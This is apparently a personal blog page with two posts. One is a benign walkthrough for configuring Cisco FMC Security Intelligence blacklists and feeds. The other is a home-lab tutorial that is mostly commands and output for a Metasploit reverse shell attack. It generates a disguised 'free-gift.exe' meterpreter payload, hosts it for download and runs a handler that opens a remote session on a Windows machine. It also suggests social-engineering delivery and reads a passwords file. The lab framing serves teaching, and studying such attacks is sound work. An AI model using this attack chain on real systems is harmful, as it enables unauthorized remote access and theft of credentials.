Friday, June 21, 2019

Configuring Cisco FMC Security Intelligence

Cisco provides feeds containing IP addresses, domain names, and URLs with poor reputation, as determined by Talos:
  • the Intelligence Feed, which comprises several regularly updated collections of IP addresses.
  • the DNS and URL Intelligence Feed, which comprises several regularly updated collections of domain names and URLs.
The Intelligence Feeds keep track of open relays, known attackers, bogus IP addresses (bogon), and so on. Because the Intelligence Feeds are regularly updated, using them ensures that the system uses up-to-date information to filter your network traffic. Malicious IP addresses, domain names, and URLs that represent security threats such as malware, spam, botnets, and phishing may appear and disappear faster than you can update and deploy new policies.

You can also customize the feature to suit the unique needs of your organization, for example:
  • third-party feeds—you can supplement the Intelligence Feeds with third-party reputation feeds, which are dynamic lists that the Firepower Management Center downloads from the internet on a regular basis
  • global blacklist and custom blacklists—the system allows you to manually blacklist specific IP addresses, URLs, or domain names in many ways depending on your needs
  • whitelisting to eliminate false positives—when a blacklist is too broad in scope, or incorrectly blocks traffic that you want to allow (for example, to vital resources), you can override a blacklist with a custom whitelist
  • enforcing blacklisting by security zone—to improve performance, you may want to target enforcement, for example, restricting spam blacklisting to a zone that handles email traffic
  • monitoring instead of blacklisting—especially useful in passive deployments and for testing feeds before you implement them; you can merely monitor and log the violating sessions instead of blocking them, generating end-of-connection events

There are two types of Cisco Security Intelligence (SI) in FMC:

You can configure Static (List) Security Intelligence under Objects > Security Intelligence > Network Lists and Feed. The Global-Blacklist and Global-Whitelist are blank by default.


You can only populate the Blacklist or Whitelist either by uploading a customized text file containing a list of IP addresses or via the Connection Event log (doing a right-click on the Responder IP).



To view the configured Security Intelligence ACP, go to Policies > Access Control > click edit (pencil icon on the far right) > Security Intelligence tab.


Click Logging (scroll icon on the far right).


DNS Blacklist Logging is enabled by default. This is to monitor SI Events.


I can initially ping DNS server public IPs before configuring Any Blacklist Rule.


You can verify the ping test under Policies > Connections > Events.


I just clicked on the Initiator IP 192.168.1.100 (my Windows wired test machine) to filter Events to a single IP.


You can Blacklist a Destination IP address (Responder IP) by doing a right-click on the specific IP > Blacklist IP Now.


Confirm by clicking Blacklist Now.


You can verify the added Blacklist IP by going again to Objects > Security Intelligence > Network Lists and Feed > Global-Blacklist > edit (pencil icon).

Notice the OpenDNS public IP is listed under the Blacklist.



The other way to update the Blacklist (or Whitelist) is by uploading a customized text file containing the IP addresses.


Go under Objects > Security Intelligence > Network Lists and Feed > click Add Network Lists and Feeds.


Type a Name and select List under Type.


Browse for the customized text file containing the IP addresses > click Upload > Save.


Notice the Number of IPs changed (2 DNS server public IPs)




Go back again to the Security Intelligence ACP under Policies > Access Control > edit (pencil icon) > Security Intelligence tab.


Locate and click the customized Blacklist (MY_BLACKLIST) under Available Objects > Networks > click Add to Blacklist > Save.


You can also change the Action (bypass) for the Blacklist Object by doing right-click > choose between Block or Monitor-only.


Click Deploy > select a device > Deploy (at the bottom).




Open a new command prompt and do the ping test again. Notice the ping to DNS public IPs timed out this time.


To view SI Events go to Analysis > Connections > Security Intelligence Events.


Notice there's an IP Block (under Reason column), the Responder IP are the Blacklisted DNS server public IPs and hit the customized Security Intelligence Category (MY_BLACKLIST).


There are two Dynamic SI Feeds configured by default: Cisco-Intelligence-Feed and Cisco-TID-Feed (started on version 6.2.2)


You can change the Update Frequency on each feed.


You can also manually add a Dynamic SI Feed by clicking on Add Network Lists and Feeds > under Type select Feed > type/paste the Feed URL and MD5 URL > click Save.


To configure Dynamic SI (Feed), you'll need to edit the ACP by going to Policies > Access Control > edit (pencil icon).


Under Security Intelligence tab > Available Objects > Networks > choose and select the pre-configured SI objects (hold Ctrl for multiple selection) > click Add to Blacklist.


Click Save and Deploy.


I just searched for a Blacklist IP that's pingable. The Blacklisted IPs are constantly updated so I just chose a random public IP for ping test.


These are the ping test prior to deploying the SI ACP.


Open a new command prompt and do the ping test again. Notice the ping timed out after the ACP was deployed.


I tried to open a suspected Malware website/IP address. You can find a list of suspected Malware IPs on this link.


Notice the public IP 80.82.77.33 was identified by the SI Category as Attackers and the 173.239.8.164 was identified as a Cryptomining site.


To Whitelist an IP address (previously Blacklisted), go to Security Intelligence Events > click a specific Blacklisted Responder IP > right-click > Whitelist IP Now.


Click White List Now to confirm the selected IP.


I also Whitelist OpenDNS public IP 208.67.222.222



You can verify the Whitelist IPs under Objects > Security Intelligence > Network Lists and Feed > edit Global-Whitelist.


The Whitelist immediately took effect without Saving and Deploy the ACP.


Verify under Analysis > Connections > Events (normal Events) and notice the Whitelisted public IPs are now Trusted (at the very bottom).


Friday, June 7, 2019

Reverse Shell Attack Using Metasploit in Kali Linux

When threat actors (hackers) gain access to a system, they usually want future access as well, and they want it to be easy. A backdoor application can be installed by the attacker to either allow future access or collect information to use in further attacks. Many backdoors are installed by users clicking something without realizing that the link they clicked or the file they opened is a threat. Backdoors can also be implemented as a result of a virus, worm, or malware.

When threat actors gain access to a system, they also might be able to take several actions. The type of action depends on the level of access the threat actor has, or can achieve, and is based on permissions granted to the account compromised by the attacker. One of the most devastating actions available to an attacker is the ability to execute code within a device. Code execution could result in an adverse impact to the confidentiality, integrity, and availability of the system or network.


root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --smallest                   Generate the smallest possible payload using all available encoders
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message


root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=1234 --format=exe > free-gift.exe      // LHOST IS KALI IP; CREATE A .exe WINDOWS PAYLOAD FILE
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

root@kali:~# ls
Desktop    Downloads      Music     Public            Templates  Videos    yersinia.log
Documents  free-gift.exe  Pictures  sshd_config.save  try2hack   websites


Run Apache web server on Kali Linux. This will be used to download the exploit on the Windows 7 machine.

root@kali:~# service apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: inactive (dead)
root@kali:~#
root@kali:~# service apache2 <ENTER>      // VIEW COMMAND COMMAND OPTIONS
Usage: apache2 {start|stop|graceful-stop|restart|reload|force-reload}
root@kali:~#
root@kali:~# service apache2 start
root@kali:~#
root@kali:~# service apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2018-10-17 04:58:39 EDT; 2s ago
  Process: 2278 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 2289 (apache2)
    Tasks: 7 (limit: 2344)
   Memory: 21.1M
   CGroup: /system.slice/apache2.service
           â”ω”€2289 /usr/sbin/apache2 -k start
           â”ω”€2290 /usr/sbin/apache2 -k start
           â”ω”€2291 /usr/sbin/apache2 -k start
           â”ω”€2292 /usr/sbin/apache2 -k start
           â”ω”€2293 /usr/sbin/apache2 -k start
           â”ω”€2294 /usr/sbin/apache2 -k start
           └─2295 /usr/sbin/apache2 -k start

Oct 17 04:58:39 kali systemd[1]: Starting The Apache HTTP Server...
Oct 17 04:58:39 kali apachectl[2278]: AH00558: apache2: Could not reliably determine the se
Oct 17 04:58:39 kali systemd[1]: Started The Apache HTTP Server.


Move the payload file (.exe) to the Apache folder:

root@kali:~# ls
Desktop    Downloads      Music     Public            Templates  Videos    yersinia.log
Documents  free-gift.exe  Pictures  sshd_config.save  try2hack   websites
root@kali:~#
root@kali:~# cp free-gift.exe /var/www/html
root@kali:~#
root@kali:~# cd /var/www/html
root@kali:/var/www/html#
root@kali:/var/www/html# ls
free-gift.exe  index.html  index.nginx-debian.html


You can also use GUI by clicking on Files (folder icon) > Home > copy free-gift.exe > Other locations > Computer > var > www > hmtl



Run the Metasploit database in order to successfully launch msfconsole.


root@kali:~# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
   Active: inactive (dead)
root@kali:~#
root@kali:~# service postgresql start
root@kali:~#
root@kali:~# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
   Active: active (exited) since Wed 2018-10-17 05:10:46 EDT; 2s ago
  Process: 2605 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 2605 (code=exited, status=0/SUCCESS)

Oct 17 05:10:46 kali systemd[1]: Starting PostgreSQL RDBMS...
Oct 17 05:10:46 kali systemd[1]: Started PostgreSQL RDBMS.


Type msfconsole to launch the Metasploit Framework and create the Windows exploit or payload.

root@kali:/var/www/html# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

[*] Starting the MetasploiT Framework console...-

[-] Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

                                                 
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.17.11-dev                         ]
+ -- --=[ 1807 exploits - 1028 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > db_status        // CONNECT TO METASPLOIT DATABASE
[*] postgresql connected to msf
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.110
LHOST => 192.168.1.110
msf exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf exploit(multi/handler) > show options      // VIEW PAYLOAD OPTIONS

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.110    yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit -h
Usage: exploit [options]

Launches an exploitation attempt.

OPTIONS:

    -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.
    -f        Force the exploit to run regardless of the value of MinimumRank.
    -h        Help banner.
    -j        Run in the context of a job.
    -n <opt>  The NOP generator to use.  If none is specified, NOP is used.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
    -t <opt>  The target index or name to use.  If none is specified, TARGET is used.
    -z        Do not interact with the session after successful exploitation.

msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.110:1234
msf exploit(multi/handler) >


Go to Windows 7 machine and download the payload via the Apache web server running in Kali. The exploit can be transferred by using other Social Engineering attack (email, USB, mirrored website, etc).


I simply chose to Run the payload (.exe). The threat actor (hacker) will make the file (or URL) enticing in order for a successful attack.


Once the payload is downloaded and opened by the victim, Metasploit detected the session.


msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.110:1234
msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.110:1234 -> 192.168.1.130:49222) at 2018-10-17 05:26:51 -0400

msf exploit(multi/handler) > sessions -i        // VIEW SESSIONS

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  WIN-7V0EVV4BKQJ\Administrator @ WIN-7V0EVV4BKQJ  192.168.1.110:1234 -> 192.168.1.130:49222 (192.168.1.130)


msf exploit(multi/handler) > sessions -i 1       // ESTABLISH REMOTE SESSION ON ID 1
[*] Starting interaction with 1...


Once you've establish the remote (backdoor) session, you can start doing a reconnaissance on the machine by issuing various shell commands.

meterpreter > sysinfo
Computer        : WIN-7V0EVV4BKQJ
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows


meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:6b:99:7a
MTU          : 1500
IPv4 Address : 192.168.1.130
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::104a:e373:9974:3524
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:182
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


I created a text file in Windows 7 Desktop and put sensitive info such as usernames and passwords. Also notice the netstat output has an ESTABLISHED TCP session with Kali 192.168.1.110 on port 1234.


meterpreter > pwd       // VERIFY CURRENT DIRECTORY
C:\Users\Administrator\Desktop

meterpreter > ls      // LIST FILES
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  44    fil   2018-10-17 05:32:07 -0400  PASSWORDS.txt
100666/rw-rw-rw-  950   fil   2018-09-15 23:03:29 -0400  PuTTY.lnk
100666/rw-rw-rw-  282   fil   2018-09-15 22:50:44 -0400  desktop.ini


meterpreter > cat PASSWORDS.txt      // VIEW CONTENTS OF THE FILE
cisco   cisco123

admin   cisco

admin   admin